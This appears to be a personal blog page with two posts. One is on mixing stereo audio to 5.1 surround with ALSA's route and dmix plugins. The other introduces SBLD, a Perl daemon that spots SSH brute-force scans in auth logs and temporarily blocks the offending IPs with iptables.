I just realized that aside from simple copies, the ALSA route_policy duplicate will mix to arbitrary numbers of output channels AND that such a device can use a Dmix PCM device as its slave. This means that it's possible to take 2 channel CD audio and have it mixed to 5.1 channel surround, and still let other applications use the sound card. This makes XMMS very happy.

On the other hand, my onboard i810 sound card reverses the surround and center channels, and it does some funky mixing on the center channel for the subwoofer, which sounds really messed up when played on the rear speakers. I haven't figured out how to compensate for this yet.

A useful ALSA FAQ can be found here: http://alsa.opensrc.org/faq/.

I wrote a quick script to analyze the logs generated by SBLD. You can pull them out of syslog, or (as I'm doing), have your log checker aggregate SBLD events for you. I'm making the statistics for my site available here, as a resource for others.

If you run a server with SSHD exposed to the internet, chances are that server is being scanned for common username and password combinations. These often appear in the authorization log (/var/log/auth.log) as entries like:

Jun 12 13:33:57 localhost sshd[18900]: Illegal user admin from 219.254.25.100<br /> Jun 12 13:37:17 localhost sshd[18904]: Illegal user admin from 219.254.25.100<br /> Jun 12 13:37:20 localhost sshd[18906]: Illegal user test from 219.254.25.100<br /> Jun 12 13:37:22 localhost sshd[18908]: Illegal user guest from 219.254.25.100<br />

Extend that for several hundred lines, and you'll have an idea of what one scan looks like.

Being somewhat opposed to the idea of people clogging my logs with useless information, I wrote a small perl script to detect these entries in the log file and block the offending source address using iptables. It detects scans within a matter of seconds, and blocks the IP quickly to stop the attack. Blocks are only enabled for a short time--as little as 30 seconds is enough to discourage most automated scanners. SBLD limits the number of simultaneous bans to reduce iptables load and it's own resource usage, and gradually decreases the alert level for hosts when no attack is taking place.

With SBLD, the scan is quickly detected and ended.

Jun 17 13:31:58 localhost sshd[3314]: Illegal user test from 209.76.72.12<br /> Jun 17 13:31:59 localhost sshd[3316]: Illegal user test from 209.76.72.12<br /> Jun 17 13:32:00 localhost sshd[3322]: Illegal user tester from 209.76.72.12<br /> Jun 17 13:32:00 localhost sbld[3326]: Blocked 209.76.72.12<br /> Jun 17 13:32:30 localhost sbld[3326]: Unblocked 209.76.72.12<br />

The detection method itself is a simple regex applied to the log file, so it should be fairly easy to extend the daemon to block other kinds of attacks.

SBLD is still under development, but I'd like to encourage people to try it out and/or offer improvements. I make no guarantees as to the performance, safety, or security of this software. Contact me with feedback.

Files

Copyright © 2012 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.